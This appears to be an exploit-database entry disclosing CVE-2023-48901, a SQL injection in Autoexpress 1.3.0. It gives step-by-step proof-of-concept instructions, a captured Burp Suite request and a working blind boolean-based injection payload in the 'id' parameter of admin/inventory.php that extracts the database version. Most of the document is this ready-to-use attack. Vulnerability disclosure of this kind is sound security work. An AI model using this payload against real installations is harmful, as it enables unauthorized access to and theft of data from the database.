Headline
Tramyardg Autoexpress 1.3.0 SQL Injection
Tramyardg Autoexpress version 1.3.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: tramyardg autoexpress - SQL Injection# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48901# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901https://www.cve.org/CVERecord?id=CVE-2023-48901# Description:Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.# Proof of Concept:+ Go to "http://localhost/autoexpress/admin/sign-in.php"+ Sign in with Admin credentials+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]+ Send it to Repeater+ Captured Burp Request:POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close# Sample RequestPOST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close